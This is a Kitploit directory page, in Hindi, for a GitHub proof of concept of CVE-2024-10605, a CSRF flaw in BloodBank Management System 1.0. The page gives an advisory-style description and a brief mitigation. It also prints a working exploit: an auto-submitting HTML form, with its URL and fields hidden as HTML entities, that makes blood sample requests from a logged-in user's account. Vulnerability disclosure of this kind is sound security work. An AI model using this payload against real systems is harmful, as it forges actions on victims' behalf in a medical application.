Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-10605 — CVE-2024-10605 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, BloodBank प्रबंधन प्रणाली 1.0 में एक CSRF भेद्यता जो अनधिकृत रक्त नमूना अनुरोधों की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/bevennyamande/cve-2024-10605
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubbevennyamande/cve-2024-10605

CVE-2024-10605

CVE-2024-10605 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, BloodBank प्रबंधन प्रणाली 1.0 में एक CSRF भेद्यता जो अनधिकृत रक्त नमूना अनुरोधों की अनुमति देती है।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

प्रभावित संस्करण:

  • BloodBank Management System: 1.0

भेद्यता जानकारी:

  • भेद्यता प्रकार: क्रॉस साइट रिक्वेस्ट फोर्जरी (CSRF)
  • गंभीरता: उच्च
  • स्थिति: अनपैच्ड

भेद्य एंडपॉइंट:

  • पथ: file/request.php

भेद्यता विवरण:

इस एंडपॉइंट /file/request.php पर क्रॉस साइट रिक्वेस्ट फोर्जरी मौजूद है, जो एक दूरस्थ उपयोगकर्ता को किसी लॉग-इन रिसीवर के खाते से, चयनित अस्पताल के उपलब्ध रक्त नमूने से रक्त नमूना अनुरोध शुरू करने की अनुमति देता है।

सफल शोषण से पीड़ित की ओर से अनधिकृत कार्य हो सकते हैं। इसके अलावा, इसका शोषण पेलोड के साथ दुर्भावनापूर्ण वेबसाइटों पर जाकर भी किया जा सकता है।


प्रूफ ऑफ कॉन्सेप्ट (PoC):

नीचे एक CSRF POC हमले का उदाहरण दिया गया है जो लॉग-इन रिसीवर के खाते से रक्त नमूना अनुरोध शुरू करता है:


<html>
    <head>
        <title>CSRF PoC</title>
    </head>
    <body>
        <form action="http://&#108;&#111;&#99;&#97;&#108;&#104;&#111;&#115;&#116;&#46;&#108;&#111;&#99;&#97;&#108;&#47;&#98;&#108;&#111;&#111;&#100;&#98;&#97;&#110;&#107;&#47;&#102;&#105;&#108;&#101;&#47;&#114;&#101;&#113;&#117;&#101;&#115;&#116;&#46;&#112;&#104;&#112;" method="POST" enctype="application/x-www-form-urlencoded">
            <input name="&#98;&#105;&#100;" value="&#49;&#54;">
            <input name="&#104;&#105;&#100;" value="&#51;">
            <input name="&#98;&#103;" value="&#66;&#45;">
            <input name="&#114;&#101;&#113;&#117;&#101;&#115;&#116;" value="&#82;&#101;&#113;&#117;&#101;&#115;&#116;&#43;&#83;&#97;&#109;&#112;&#108;&#101;">
        </form>
        <script>
            document.querySelector("form").submit();
        </script>
    </body>
</html>






प्रभाव:

  • डेटा हेरफेर: हमलावर उपयोगकर्ताओं को दिखाई जाने वाली सामग्री को संशोधित कर सकते हैं।
  • प्रतिष्ठा क्षति: दुर्भावनापूर्ण व्यवहार के कारण उपयोगकर्ता सिस्टम पर विश्वास खो सकते हैं।

शमन सिफारिशें:

  1. CSRF टोकन का उपयोग करें: क्रॉस डोमेन पहुंच को रोकने के लिए तंत्र लागू करें या अपने अनुरोध में csrf टोकन डालें।
टूल डाउनलोड करें